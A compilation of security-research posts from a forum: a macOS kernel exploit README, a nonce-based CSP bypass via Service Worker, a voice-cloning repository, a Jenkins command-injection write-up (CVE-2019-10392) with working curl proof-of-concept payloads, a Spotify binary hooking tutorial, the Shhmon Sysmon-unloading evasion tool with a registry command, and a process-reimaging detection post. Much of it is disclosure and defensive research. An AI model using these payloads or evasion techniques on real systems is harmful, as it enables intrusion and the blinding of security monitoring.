Sursa: https://objective-see.com/blog/blog_0x47.html
  11. macOS-Kernel-Exploit

DISCLAIMER
You need to know the KASLR slide to use the exploit. Also, SMAP needs to be disabled, which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation, but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only.

General
macOS kernel exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published). Thanks to @LinusHenze for this cool bug and his support ;P.

Writeup
Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started:

VM: Download the macOS installer from the App Store and drag the .app file into VMware's NEW VM window
Kernel debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
Have a look at the _kernel_trap function

Build
I recommend setting the bootargs to: debug=0x44 kcsuffix=development -v
⚠️ Note: SMAP needs to be disabled on Macs after 2015 (-pmap_smap_disable)
You will need Xcode <= 9.4.1 to build the exploit (it needs to be 32-bit). Downloading the Xcode 9.4.1 Command Line Tools should be enough. Download: https://developer.apple.com/download/more/
make

Execution
./exploit <KASLR slide>
Tested on macOS Mojave: Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64

Demo:

Sursa: https://github.com/A2nkF/macOS-Kernel-Exploit/
  12. Nonce-based CSP + Service Worker = CSP bypass?

Service Worker is a great technology that allows you to develop a web app's offline experience and increase the performance of your website. But this also means that a web page is cached. And if your website has a nonce-based CSP, then your CSP will also be cached. This means that no matter how random the nonce is (and you serve different nonces for every request), as long as Service Worker sees that the request is the same, it'll respond with cached content, which always has the same CSP nonce.

To see if this can be exploited, I made a CSP bypass challenge.

https://vuln.shhnjk.com/secure_sw.php#Guest

The above page uses Strict CSP, and the Service Worker code was taken from Google's SW intro page (the second example you see when you click the link). So it should be safe against XSS bugs, right? Well, the challenge was made in a way that it's possible to bypass Strict CSP, and I'm hoping that people will find this CSP bypass in real websites someday.

The challenge has 2 injection points.

location.hash (Service Worker doesn't see the hash)
Referrer passed to the server (Service Worker doesn't see this either)

There are many other sources of XSS that Service Worker doesn't use as a key for a request (e.g. a stored XSS payload can't be keyed either). The intended solution was the following.

https://attack.shhnjk.com/CSP_SW_bypass.html?%3Ciframe%20src=%27https://attack.shhnjk.com/get_nonce.html%27%20name=%27

Gareth wrote a great post about leaking information using the <base> tag's target attribute even under Strict CSP. I used a similar trick, an iframe's name. I used the referrer to inject an iframe, and the name attribute leaked the nonce of the legit script tag; I then simply used the leaked nonce to execute script through location.hash. This is possible because Service Worker doesn't care about changes in location.hash, so it'll still serve cached content.

On the other hand, @lbherrera_ solved the challenge using CSS.
https://lbherrera.me/solver.html

He used the referrer to inject an <input> tag with the nonce as its value, and then brute-forced the nonce character by character using CSS. When the brute-force identifies a character, it sends a request to his server, which sets a cookie with the matched nonce character, saving the whole nonce this way. After the whole nonce is stolen, he uses location.hash to perform XSS with the proper nonce.

Conclusion:
Service Worker might help bypass nonce-based CSP. Always fix XSS bugs even if the XSS is blocked by CSP. From time to time, I find CSP bypasses in the browser as well (e.g. this). All mitigations have bypasses.

Sursa: https://shhnjk.blogspot.com/2019/09/nonce-based-csp-service-worker-csp.html
  13. Real-Time Voice Cloning

This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious, or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction.

SV2TTS is a three-stage deep learning framework that allows one to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices.

Video demonstration (click the picture):

Papers implemented
URL | Designation | Title | Implementation source
1806.04558 | SV2TTS | Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis | This repo
1802.08435 | WaveRNN (vocoder) | Efficient Neural Audio Synthesis | fatchord/WaveRNN
1712.05884 | Tacotron 2 (synthesizer) | Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions | Rayhane-mamah/Tacotron-2
1710.10467 | GE2E (encoder) | Generalized End-To-End Loss for Speaker Verification | This repo

News
20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it.
06/07/19: Need to run within a docker container on a remote server? See here.
25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM.

Quick start
Requirements
You will need the following whether you plan to use the toolbox only or to retrain the models.
Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib.
Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1). 
A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox. Pretrained models Download the latest here. Preliminary Before you download any dataset, you can begin by testing your configuration with: python demo_cli.py If all tests pass, you're good to go. Datasets For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. Toolbox You can then try the toolbox: python demo_toolbox.py -d <datasets_root> or python demo_toolbox.py depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue. Wiki How it all works (WIP - stub, you might be better off reading my thesis until it's done) Training models yourself Training with other data/languages (WIP - see here for now) TODO and planned features Contribution Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute. Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
  14. Sep 12, 2019

CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins

Two weeks ago I saw on GitHub a nice repository about pentesting Jenkins. I downloaded the latest alpine LTS build from Docker Hub and started to play with it, ending up finding an authenticated remote command execution exploitable by a user with the Job/Configure (USE_ITEM) privilege. 🐱‍👤

Discovery
I launched a Jenkins instance locally with Docker using the following command:

docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine

In my case, the software versions are:
Jenkins 2.176.3
Git Client Plugin 2.8.2
Git Plugin 3.12.0

I proceeded through the initial configuration and created a non-administrative user. After logging in as the user test, we create a new job definition via the web user interface. If we select Git as our source in the SCM section, we are asked to insert a Git URL. Let's fuzz it! 🤖

If we try common command injection payloads, we notice that we can't execute arbitrary commands, but if we input the string -v as the URL, we will receive the following output:

Failed to connect to repository : Command "git ls-remote -h -v HEAD" returned status code 129:
stdout:
stderr: error: unknown switch `v'
usage: git ls-remote [--heads] [--tags] [--refs] [--upload-pack=<exec>]
                     [-q | --quiet] [--exit-code] [--get-url] [--symref]
                     [<repository> [<refs>...]]

    -q, --quiet           do not print remote URL
    --upload-pack <exec>  path of git-upload-pack on the remote host
    -t, --tags            limit to tags
    -h, --heads           limit to heads
    --refs                do not show peeled tags
    --get-url             take url.<base>.insteadOf into account
    --sort <key>          field name to sort on
    --exit-code           exit with exit code 2 if no matching refs are found
    --symref              show underlying ref in addition to the object pointed by it
    -o, --server-option <server-specific>
                          option to transmit

We have just discovered that command line switches are interpreted by Git, thanks to the error: unknown switch `v' message.
Can we do more than printing the Git usage? Let’s find it out! 🕵️ Exploitation I looked at man git-ls-remote in order to see the available command options and I noticed the --upload-pack=<exec> flag. By trying --upload-pack=id, I got: Failed to connect to repository : Command "git ls-remote -h --upload-pack=id HEAD" returned status code 128: stdout: stderr: id: ‘HEAD’: no such user fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. The command id HEAD was executed on the system! 🤹‍ We can control the full command being executed using the following payload: --upload-pack="`id`" Failed to connect to repository : Command "git ls-remote -h --upload-pack="`id`" HEAD" returned status code 128: stdout: stderr: "`id`" 'HEAD': line 1: uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins): not found fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. We successfully executed the id command in the context of the jenkins user! 
💥 Proof of Concept
First we need to retrieve the CSRF token (crumb) and then issue the request:

# get crumb
curl 'http://localhost:8080/securityRealm/user/test/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'DNT: 1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://localhost:8080/' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'Cookie: <COOKIES>' --compressed

# send request
curl 'http://localhost:8080/job/test/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl' -d "value=--upload-pack=`touch /tmp/iwantmore.pizza`" -H 'Cookie: <COOKIES>' -H 'Origin: http://localhost:8080' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'X-Prototype-Version: 1.7' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Jenkins-Crumb: <CRUMB>' -H 'Pragma: no-cache' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H 'Cache-Control: no-cache' -H 'Referer: http://localhost:8080/job/test/configure' -H 'DNT: 1' --compressed

Reporting
I reported the issue to the Jenkins JIRA and in less than one week the vulnerability was confirmed to be fixed in the staging environment. Props to the Jenkins team for how they managed the responsible disclosure process, in particular to Daniel Beck and Mark Waite.
👏 Timeline 2019-09-03: vulnerability discovered 2019-09-03: vulnerability reported 2019-09-04: first response by the vendor 2019-09-04: vulnerability acknowledged 2019-09-07: fix available 2019-09-08: fix confirmed 2019-09-08: CVE-2019-10392 was issued 2019-09-11: pre announcement 2019-09-12: @TheHackersNews tweet 2019-09-12: fix released and public announcement Sursa: https://iwantmore.pizza/posts/cve-2019-10392.html
  15. Skiptracing: Automated Hook Resolution

Sam Lerner
Sep 17 · 11 min read

This post is the third part of my series about tracking skips in the Spotify client. This post is a direct continuation of my work on the MacOS client first detailed here: https://medium.com/@lerner98/skiptracing-reversing-spotify-app-3a6df367287d.

Hardcoding Addresses
In the previous article, I hooked the target functions using HookCase to track when the skip subprocedure was called. However, there was one big problem with this approach that I didn't realize at the time. One day, I decided to see how many skipped songs I had logged. It seemed low. I then decided to skip a few songs and again print out the number of songs. It didn't change. Dammit! Something broke and I have no clue what.

Finding the Problem
Let's crack open Spotify in IDA and go to our hook addresses as a sanity check. In the previous article, I made a big deal about finding sub_100CC2E20, so let's go there and see what could've gone wrong:

This doesn't look anything like our next procedure. In fact, 0x100CC2E20 isn't even on an instruction boundary. This is a big problem. Going back to the mediaKeyTap method, we find a familiar-looking CFG:

However, there is one big (highlighted) difference. The address of our called procedure has changed from 0x10006FE10 to 0x100069CF0, a difference of -24864 bytes. Now going to our function with the big switch statement:

We see that it is now located at 0x100067E40 when it was located at 0x10006DE40 previously: a difference of -24576. The closeness of these offsets gives us a clue to what is going on. My theory is that Spotify occasionally updates itself and on this particular update (or set of updates), around 24000 bytes were removed before our target procedures and a couple hundred were added in between them. This presents us with a conundrum: how do we find the correct addresses to hook when they could change between runs? The answer is Objective-C.
Objective-C
Objective-C is at heart a dynamic language. You can add methods to a class, change a method's implementation, and do all sorts of fuckery at runtime. To support this behavior, the class information must be stored in the application binary somewhere. If you run objdump -h on the Spotify binary, you'll see the following interesting sections: namely the sections that begin with __objc. The first section we'll want to take a look at is the __objc_classlist section. While undocumented, this section contains an array of pointers into the __objc_data section where each pointer points to an objc_class struct. We will discuss the layout of the struct later. Our end goal will be to find the addresses of the unnamed next and previous subprocedures, but our bridge to these addresses will be the mediaKeyTap method because we can always find it with the help of the Objective-C class data.

Resolving Objective-C Methods
The class that responds to the mediaKeyTap:receivedMediaKeyEvent: selector is SPTBrowserClientMacObjCAnnex. Therefore, we can iterate over the objc_class structures pointed to by the __objc_classlist section until the name of the struct is equal to SPTBrowserClientMacObjCAnnex. Let's get to it. First, we have to iterate over the __objc_classlist section. But to do that, we need to know where the section is. This information is contained within the Mach-O header (which is why it was revealed with objdump -h).

Parsing the Header
There are plenty of existing articles about the Mach-O file format and the documentation is fairly lucid, so I won't go into too much detail here. All you really need to know is that there are several "segment load commands" contained within the header. A segment load command (LC) simply specifies a region of the file and where to map it into memory. Directly after the segment LC, there will be a number of section structs.
Each section’s extent both within the file and virtual memory are contained within its corresponding segment but the sections offer a more fine-grained mapping. If you were paying attention before, the __objc_classlist section is contained within the __DATA segment. Therefore, we can find it’s region in the file like so: #include <mach-o/loader.h>FILE *fp; size_t i,j,curr_off; struct mach_header_64 header; struct load_cmd load_cmd; struct segment_command_64 seg_cmd; struct section_64 sect;struct section_64 objc_classlist_sect;fp = fopen("/Applications/Spotify.app/Contents/MacOS/Spotify", "r"); fread(&header, sizeof(header), 1, fp); Here, we are simply setting up some variables and reading in the Mach-O header. Then, we can iterate over the load commands: for (i=0; i<header.ncmds; i++) { fread(&load_cmd, sizeof(load_cmd), 1, fp); if (load_cmd.cmd != LC_SEGMENT_64) { fseek(fp, load_cmd.cmdsize - sizeof(load_cmd), SEEK_CUR); continue; } fread((char *)&seg_cmd + sizeof(load_cmd), sizeof(seg_cmd) - sizeof(load_cmd), 1, fp); if (strcmp(seg_cmd.segname, "__DATA")) { fseek(fp, load_cmd.cmdsize - sizeof(seg_cmd), SEEK_CUR); continue; } Here, we ignore any LC’s that are not segment LC’s (there are many different types specified in the ABI). Then, we read in the LC as a segment LC and ignore it if it is not the __DATA segment. Then, we will iterate over sections in the __DATA segment: for (j=0; j<seg_cmd.nsects; j++) { fread(&sect, sizeof(sect), 1, fp); if (!strncmp(sect.sectname, "__objc_classlist", 16)) { memcpy(&objc_classlist_sect, &sect, sizeof(sect)); break; } } break; } Once we find the section with the correct name, we copy it into our target variable and exit the loop. Now that we can iterate over the objc_class structs, we need to know how to get the class name and method names for each class. 
While the Objective-C runtime is open source, I couldn't find the type declarations corresponding to the version of Objective-C used in the Spotify binary, so you can declare the types like so:

The fields are of type uint64_t instead of pointers because they are used as offsets into the file. The __DATA segment could be mmap'd and then the values treated as pointers, but this leads to complications when mmap is unable to allocate the segment at its original address. Anyways, the data field of objc_class "points" to an objc_class_data structure. This structure contains both the name of the class and a base_methods "pointer" to the methods defined for this class. The method list consists of an objc_methodlist struct followed by objc_methodlist.count objc_method structures. Each objc_method struct will tell us the method name and its imp pointer (and its type signature, but we don't really care about that). I'll link to the code later, but it's a straightforward extension of the previous code listings to iterate through the classes to find our SPTBrowserClientMacObjCAnnex class and iterate through the class's methods to find the mediaKeyTap:receivedMediaKeyEvent: selector.

Finding the Call
Assuming we have the imp pointer for our mediaKeyTap: method, we can then use the Capstone library to disassemble the function and find the call to the media key tap handler:

#include <capstone/capstone.h>

uint8_t code[500];
size_t start_addr, i, insn_count;
uint64_t target_addr;
csh handle;
cs_insn *insn;

fseek(fp, (meth->imp) & 0xffffff, SEEK_SET);
fread(code, 1, 500, fp);

cs_open(CS_ARCH_X86, CS_MODE_64, &handle);

start_addr = meth->imp;
insn_count = cs_disasm(handle, code, 500, start_addr, 0, &insn);

for (i=0; i<insn_count; i++) {
    if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, 3"))
        continue;
    target_addr = strtoll(insn[i+2].op_str, NULL, 16);
    break;
}

We look for the "next" case (that is, mov esi, 3) since, if you look at the disassembly, this case actually comes first in memory.
We then take the instruction two after the mov esi, 3 instruction to find our target call. Remember that this subprocedure is actually a wrapper for our final target, so we have to perform the same disassembly procedure on the following function:

Taking note of the highlight, after checking some conditions, this function jumps to our final destination five instructions after preparing register esi with the contents of register r14d. Therefore, we can do something like:

...

if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, r14d"))
    continue;

*reloc_addr = insn[i+5].address+1;
*reloc_pc = insn[i+5].address + insn[i+5].size;
target_addr = strtoll(insn[i+5].op_str, NULL, 16);

...

Here, when we find our sentinel instruction, mov esi, r14d, in addition to setting our target address (the address of the function with the large switch statement), we set two additional variables: reloc_addr and reloc_pc. To understand these two variables, we first need to cover how we will automate the hooking process.

Automatic Hooking
Normally, the control flow from our media key handler wrapper will look like:

However, we will patch instructions to make it look like:

The redirect to "my MK Handler" will be done by patching the jmp sub_100067E40 instruction in the wrapper to actually be jmp &new MK Handler. Since jmp tells the CPU to set the new program counter (PC) relative to where it currently is, we need to know what the program counter will be after this instruction executes. This is where the variable reloc_pc comes into play. We set it to insn[i+5].address + insn[i+5].size because that is what the PC will be after the jmp executes. We also need to know the address of the relative offset in the jmp instruction in order to patch it. Since the jmp opcode is only one byte, we set reloc_addr to insn[i+5].address+1.

Patching the jmp
Now that we have the PC after the jump and the address of the offset, we can actually patch the instruction to jump to our own code.
To do this, we will create a dylib and insert an LC_LOAD_DYLIB LC into the Mach-O load commands, much like in my iOS post: https://medium.com/@lerner98/skiptracing-part-2-ios-3c610205858b. Assume that in the library constructor, we called our resolve function and got three pieces of information:

mkHandler, the address of Spotify's media key handler function
mk_reloc_addr, the address of the offset in the jump to mkHandler
mk_reloc_pc, the PC after the aforementioned jump

We now have to adjust the memory protections for the bytes we wish to write, since by default the __TEXT segment has only RX permissions initially. Thankfully, the max protections specified in the binary are RWX (even though we could patch this as well). Let's do this:

uint64_t prot_mask;
uint64_t prot_addr;
size_t prot_size;

prot_mask = ~((1 << 12) - 1); // since page size is 4k
prot_addr = mk_reloc_addr & prot_mask;
prot_size = 4 + mk_reloc_addr - prot_addr;

mprotect((void *)prot_addr, prot_size, PROT_WRITE);

*mk_reloc_addr = (int32_t)((int64_t)(&new_mkHandler) - mk_reloc_pc);

mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC);

where new_mkHandler is defined as:

void new_mkHandler(void ***appDelegate, int32_t keyCode);

Note that we have to mask off the lower twelve bits of mk_reloc_addr since mprotect requires that the address we pass be page-aligned. We then need to adjust the size of our protected region from four bytes (since the jump offset is 32 bits) to account for the difference between mk_reloc_addr and prot_addr. Let's put some dummy code in new_mkHandler just to see if we hit it:

void new_mkHandler(void ***appDelegate, int32_t keyCode)
{
    printf("here!\n");
    exit(69);
}

To load our dylib, we can use the code from Part 2 to insert a LC_LOAD_DYLIB command into the Mach-O file. If we do this and run the Spotify application, then sure enough we should see our print statement (if running through the command line) and we should have a nice exit code.
Overwriting the Function Pointers
Calling our own prev and next subprocedures instead of Spotify's will require some ingenuity. To see why, let's take a look at the "next" case in the MK handler switch statement:

Note that at the beginning of the function, the app delegate pointer (in rdi) is moved into register r13. Therefore, the code dereferences the app delegate twice and then moves a function pointer at offset 0x58 of that struct into register r12. This is the register that holds the address of the next subprocedure, and it is called at the bottom of the listing. Looking through the rest of the MK handler, we can see that offset 0x58 into the rax struct is only referenced here, so we can safely overwrite the function pointer at that address so that the address of our own next subprocedure will be loaded into r12 and subsequently called.

If we look at the "prev" case, we can see that the exact same steps are taken, except the function pointer is located at offset 0x50 in the rax struct. Therefore, we can write some code in our new_mkHandler to overwrite these function pointers, because we can make no assumptions as to the address of the rax struct before the MK handler is called.
The code will look something like this:

typedef void prev_next_func_t(int64_t, int64_t, int64_t);

uint64_t prot_mask;
uint64_t prot_addr;
size_t prot_size;
uint64_t fp_off;
uint64_t *fp;

prot_mask = ~((1 << 12) - 1); // since page size is 4k

fp_off = (uint64_t)(**appDelegate) + 0x50;
fp = (uint64_t *)fp_off;

prevHandler = (prev_next_func_t *)(*fp);
nextHandler = (prev_next_func_t *)(*(fp+1));

prot_addr = fp_off & prot_mask;
prot_size = 16 + fp_off - prot_addr;

mprotect((void *)prot_addr, prot_size, PROT_WRITE);

*fp = (uint64_t)(&new_prevHandler);
*(fp+1) = (uint64_t)(&new_nextHandler);

mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC);

where new_prevHandler and new_nextHandler are defined as:

void new_prevHandler(int64_t p1, int64_t p2, int64_t p3);
void new_nextHandler(int64_t p1, int64_t p2, int64_t p3);

It can be seen from the disassembly that the prev and next subprocedures take three 64-bit parameters, but we don't really need to know what they are. One gotcha is that we should only overwrite the function pointers once. To see why, think about what will happen the second time new_mkHandler is called. We set prevHandler to the first function pointer. However, we have already overwritten this function pointer with &new_prevHandler. Therefore, when we want to actually go to the previous track in new_prevHandler and call (*prevHandler)(p1, p2, p3), we will actually be calling new_prevHandler and will eventually overflow the stack. Therefore, we add a simple guard at the beginning to check if we have already overwritten the handlers:

if (gHandlersSet) goto call_original;

... overwrite function pointers ...

gHandlersSet = 1;

call_original:
(*mkHandler)(appDelegate, keyCode);

Now in new_prevHandler and new_nextHandler, all we have to do is push/pop a skip when appropriate and call (*prevHandler)(p1, p2, p3) or (*nextHandler)(p1, p2, p3).

Wrapping Up
All that's left to do is get the current track and player position.
Since these are exposed by Objective-C methods, we can use the functionality of the Objective-C runtime to call the appropriate functions without any patching, much like in Part 2. Here's the link to the final repository, which I've refactored to include the MacOS and iOS code: https://github.com/SamL98/SPSkip. I hope you enjoyed this exploration in patching and automated reverse engineering — I sure did!

Written by Sam Lerner

Sursa: https://medium.com/swlh/skiptracing-automated-hook-resolution-74eda756533d
  16. Shhmon — Silencing Sysmon via Driver Unload

Matt Hand
Sep 18 · 4 min read

Sysmon is an incredibly powerful tool to aid in data collection beyond Windows' standard event logging capabilities. It presents a significant challenge for us as attackers, as it has the ability to detect many indicators that we generate during operations, such as process creation, registry changes, and file creation, among many other things. Sysmon is composed of two main pieces: a system service and a driver. The driver provides the service with information which is processed for consumption by the user. Both the service's and the driver's names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host.

Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. This also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe and the service is still running.

https://github.com/matterpreter/Shhmon

Although the Sysmon driver can be renamed during installation (Sysmon.exe -i -d $DriverName), it is always loaded at a predefined altitude of 385201. A driver altitude is a unique identifier allocated by Microsoft indicating the driver's position relative to others in the file system stack. Think of this as a driver's assigned parking spot: each driver has a reserved spot where it is supposed to park, and the driver should abide by this allocation.

We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at altitude 385201 and unload it. This is similar to the functionality behind fltMC.exe unload $DriverName, but allows us to evade command line logging which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivilege enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges.
Defensive Guidance This technique generates interesting events worth investigating and correlating. Sysmon Event ID 255: Once the driver is unloaded, an error event with an ID of "DriverCommunication" will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon. Windows System Event ID 1: This event will also be generated on unload from the source "FilterManager", stating File System Filter <DriverName> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart. Windows Security Event ID 4672: In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivilege. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not part of its standard permission set. Sysmon Event ID 1/Windows Security Event ID 4688: Despite the intent of evading command-line logging by using the API, the calling process will still be logged. An abnormal, high-integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike’s execute-assembly functionality, where a seemingly innocuous binary would be the calling process. Going beyond these, I have found that Sysmon’s driver altitude can be changed via the registry: reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337 When the system is rebooted, the driver will be reloaded at the newly specified altitude. Sysmon with a non-default driver name running at altitude 31337 The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for.
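A defender-side sketch of that registry discovery: even when the driver and its altitude are changed, the instance key is still named "Sysmon Instance". Here the registry tree is modeled as a plain dict (a real check would read HKLM\SYSTEM\CurrentControlSet\Services via winreg or PowerShell), and the service names are made up:

```python
def find_sysmon_instances(services):
    """Scan a dict mimicking HKLM\\SYSTEM\\CurrentControlSet\\Services for
    minifilters whose instance subkey is named 'Sysmon Instance' -- the key
    name survives both a driver rename and an altitude change."""
    hits = []
    for svc_name, instances in services.items():
        if "Sysmon Instance" in instances:
            hits.append((svc_name, instances["Sysmon Instance"].get("Altitude")))
    return hits

registry = {
    "WdFilter":  {"WdFilter Instance": {"Altitude": "328010"}},
    "NotSysmon": {"Sysmon Instance":   {"Altitude": "31337"}},
}
print(find_sysmon_instances(registry))  # [('NotSysmon', '31337')]
```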
Note: I have found during testing that if the Sysmon driver is configured to load at the altitude of another registered service, it will fail to load at boot. Additionally, there may be an opportunity to audit a handle being opened on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks to Matt Graeber and Brian Reitz for helping me home in on these. References: Research inspiration from @Carlos_Perez’s post describing this tactic, as well as Matt Graeber and Lee Christensen’s Black Hat USA 2018 white paper. Aleksey Kabanov’s LazyCopy minifilter, for demonstrating the marshaling of filter information and the method for creating resizable buffers. Posts By SpecterOps Team Members Written by Matt Hand I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter Sursa: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
17. You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior Jonathan Johnson, Sep 16 Background: Around 3 months ago, a new attack technique was introduced to the InfoSec community known as “Process Reimaging.” This technique was released by the McAfee Security team in a blog titled “In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass.” A few days after this attack technique was released, a co-worker and friend of mine, Dwight Hohnstein, came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn’t yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion tactic. Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight’s proof of concept code. A brief high-level outline of the attack is as follows: Process Reimaging is an attack technique that leverages inconsistencies in how the Windows operating system determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with that of a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing. There are three stages involved in this attack: (1) A binary is dropped to disk. This assumes breach and that the attacker can drop a binary to disk. (2) The undetected binary is loaded; this will be the original image loaded after process creation. (3) The malicious binary is “reimaged” to a known good binary it would like to appear as. This is achievable because the Virtual Address Descriptors (VADs) don’t update when the image is renamed.
Consequently, this allows the wrong process image file information to be returned when queried by applications, which gives an adversary the opportunity to evade detection efforts by analysts and incident responders. Too often, organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being run across their environment. Moreover, by relying too heavily on the base configurations of EDR products (e.g., Windows Defender), you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as whether GetMappedFileName properly detects this reimaging). Based on these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process, and if it is, it returns the name of the memory-mapped file. This API requires the PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. Additionally, any time a handle has the access right PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access.
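The access-mask arithmetic behind that false-positive overlap can be checked directly; the constants below are the documented Windows process access rights:

```python
PROCESS_VM_READ                   = 0x0010
PROCESS_QUERY_INFORMATION         = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# What GetMappedFileName needs the handle to have:
requested = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
print(hex(requested))  # 0x410

# PROCESS_QUERY_INFORMATION implicitly grants PROCESS_QUERY_LIMITED_INFORMATION,
# so the effective granted mask also contains the 0x1010 combination -- the same
# bits Mimikatz asks for when opening LSASS, hence the false positives.
granted = requested | PROCESS_QUERY_LIMITED_INFORMATION
mimikatz_like = PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ
print(hex(mimikatz_like))                    # 0x1010
print(granted & mimikatz_like == mimikatz_like)  # True
```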
